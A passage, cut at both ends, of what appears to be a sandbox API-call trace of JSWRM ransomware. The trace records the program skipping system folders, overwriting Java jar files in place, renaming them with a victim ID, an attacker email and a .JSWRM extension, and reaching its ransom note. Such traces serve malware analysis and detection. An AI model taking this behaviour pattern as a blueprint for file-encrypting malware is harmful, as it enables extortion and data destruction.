(lpString1="dnsns.jar", lpString2="msocache") returned -1 [0070.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0070.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dnsns.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dnsns.jar", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dnsns.jar", lpUsedDefaultChar=0x0) returned 9 [0070.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0070.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0070.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dnsns.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="dnsns.jar", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="dnsns.jar", lpUsedDefaultChar=0x0) returned 9 [0070.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0070.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209788 [0070.116] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2094b8 | out: hHeap=0x1e0000) returned 1 [0070.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.116] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209440 [0070.116] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.116] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8286) returned 1 [0070.116] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.116] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2050) returned 0x24e1e0 [0070.116] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x2050, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x2050, lpOverlapped=0x0) returned 1 [0070.118] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.118] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x2050, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x2050, lpOverlapped=0x0) returned 1 [0070.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.118] CloseHandle (hObject=0x458) returned 1 [0070.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0070.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.118] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.118] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.118] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0070.119] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0070.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225080 [0070.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225080 | out: hHeap=0x1e0000) returned 1 [0070.119] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f848 [0070.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.119] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\dnsns.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0070.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0070.119] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209440 | out: hHeap=0x1e0000) returned 1 [0070.119] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8bb82c9, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0xade4, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jaccess.jar", cAlternateFileName="")) returned 1 [0070.119] lstrcmpiW (lpString1="jaccess.jar", lpString2=".") returned 1 [0070.119] lstrcmpiW (lpString1="jaccess.jar", lpString2="..") returned 1 [0070.119] lstrcmpiW (lpString1="jaccess.jar", lpString2="...") returned 1 [0070.119] lstrcmpiW (lpString1="jaccess.jar", lpString2="windows") returned -1 [0070.119] lstrcmpiW (lpString1="jaccess.jar", lpString2="recovery") returned -1 [0070.120] lstrcmpiW (lpString1="jaccess.jar", lpString2="perflogs") returned -1 [0070.120] lstrcmpiW (lpString1="jaccess.jar", lpString2="documents and settings") returned 1 [0070.120] lstrcmpiW (lpString1="jaccess.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.120] lstrcmpiW (lpString1="jaccess.jar", lpString2="system volume information") returned -1 [0070.120] lstrcmpiW (lpString1="jaccess.jar", lpString2="msocache") returned -1 [0070.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0070.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaccess.jar", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaccess.jar", cchWideChar=11, lpMultiByteStr=0x345ebd8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jaccess.jar", lpUsedDefaultChar=0x0) returned 11 [0070.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0070.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0070.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaccess.jar", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0070.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jaccess.jar", cchWideChar=11, lpMultiByteStr=0x345eba8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jaccess.jar", lpUsedDefaultChar=0x0) returned 11 [0070.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0070.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2093c8 [0070.120] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209788 | out: hHeap=0x1e0000) returned 1 [0070.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.120] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.120] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209710 [0070.120] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.121] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=44516) returned 1 [0070.121] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.121] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xade0) returned 0x24e1e0 [0070.121] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0xade0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0xade0, lpOverlapped=0x0) returned 1 [0070.125] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.125] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0xade0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0xade0, lpOverlapped=0x0) returned 1 [0070.125] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.125] CloseHandle (hObject=0x458) returned 1 [0070.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209260 [0070.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a288 [0070.126] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a288, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a288 | out: hHeap=0x1e0000) returned 1 [0070.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x224f70 [0070.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x224f70 | out: hHeap=0x1e0000) returned 1 [0070.126] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f030 [0070.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.126] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jaccess.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f030 | out: hHeap=0x1e0000) returned 1 [0070.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209260 | out: hHeap=0x1e0000) returned 1 [0070.126] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209710 | out: hHeap=0x1e0000) returned 1 [0070.126] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa8bb82c9, ftCreationTime.dwHighDateTime=0x1d327cc, ftLastAccessTime.dwLowDateTime=0xa8bb82c9, ftLastAccessTime.dwHighDateTime=0x1d327cc, ftLastWriteTime.dwLowDateTime=0xa8c0476d, ftLastWriteTime.dwHighDateTime=0x1d327cc, nFileSizeHigh=0x0, nFileSizeLow=0x1166a99, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="jfxrt.jar", cAlternateFileName="")) returned 1 [0070.126] lstrcmpiW (lpString1="jfxrt.jar", lpString2=".") returned 1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="..") returned 1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="...") returned 1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="windows") returned -1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="recovery") returned -1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="perflogs") returned -1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="documents and settings") returned 1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="$RECYCLE.BIN") returned 1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="system volume information") returned -1 [0070.127] lstrcmpiW (lpString1="jfxrt.jar", lpString2="msocache") returned -1 [0070.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0070.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxrt.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxrt.jar", cchWideChar=9, lpMultiByteStr=0x345ebd8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxrt.jar", lpUsedDefaultChar=0x0) returned 9 [0070.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0070.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241060 [0070.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxrt.jar", cchWideChar=9, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 9 [0070.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="jfxrt.jar", cchWideChar=9, lpMultiByteStr=0x345eba8, cbMultiByte=9, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="jfxrt.jar", lpUsedDefaultChar=0x0) returned 9 [0070.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241060 | out: hHeap=0x1e0000) returned 1 [0070.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209698 [0070.127] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2093c8 | out: hHeap=0x1e0000) returned 1 [0070.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0070.127] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0070.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x209800 [0070.127] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x458 [0070.127] GetFileSizeEx (in: hFile=0x458, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=18246297) returned 1 [0070.127] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.127] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x27100) returned 0x24e1e0 [0070.127] ReadFile (in: hFile=0x458, lpBuffer=0x24e1e0, nNumberOfBytesToRead=0x27100, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesRead=0x345e89c*=0x27100, lpOverlapped=0x0) returned 1 [0070.148] SetFilePointer (in: hFile=0x458, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0070.148] WriteFile (in: hFile=0x458, lpBuffer=0x24e1e0*, nNumberOfBytesToWrite=0x27100, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24e1e0*, lpNumberOfBytesWritten=0x345e898*=0x27100, lpOverlapped=0x0) returned 1 [0070.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24e1e0 | out: hHeap=0x1e0000) returned 1 [0070.149] CloseHandle (hObject=0x458) returned 1 [0070.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x70) returned 0x2091e8 [0070.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0070.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0070.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0070.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0070.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a348 [0070.149] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a348, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0070.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a348 | out: hHeap=0x1e0000) returned 1 [0070.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x80) returned 0x225108 [0070.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xbe) returned 0x1fc808 [0070.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x225108 | out: hHeap=0x1e0000) returned 1 [0070.149] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11c) returned 0x23f5f8 [0070.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1fc808 | out: hHeap=0x1e0000) returned 1 [0070.149] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0070.149] MoveFileW (lpExistingFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar"), lpNewFileName="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\java\\jre1.8.0_144\\lib\\ext\\jfxrt.jar.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0070.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f5f8 | out: hHeap=0x1e0000) returned 1 [0070.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2091e8 | out: hHeap=0x1e0000) returned 1 [0070.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x209800 | out: hHeap=0x1e0000) returned 1 [0070.150] FindNextFileW (in: hFindFile=0x231ac0, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x206d31c2, ftCreationTime.dwHighDateTime=0x1d53d3c, ftLastAccessTime.dwLowDateTime=0x206d31c2, ftLastAccessTime.dwHighDateTime=0x1d53d3c, ftLastWriteTime.dwLowDateTime=0x206d31c2, ftLastWriteTime.dwHighDateTime=0x1d53d3c, nFileSizeHigh=0x0, nFileSizeLow=0x230c, dwReserved0=0x77c29fd0, dwReserved1=0xcb6ad372, cFileName="JSWRM-DECRYPT.hta", cAlternateFileName="JSWRM-~1.HTA")) returned 1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2=".") returned 1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="..") returned 1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="...") returned 1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="windows") returned -1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="recovery") returned -1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="perflogs") returned -1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="documents and settings") returned 1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="$RECYCLE.BIN") returned 1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="system volume information") returned -1 [0070.150] lstrcmpiW (lpString1="JSWRM-DECRYPT.hta", lpString2="msocache") returned -1 [0070.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0070.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x2410d8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0070.150] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0070.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0070.150] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0070.150] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0070.151] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, 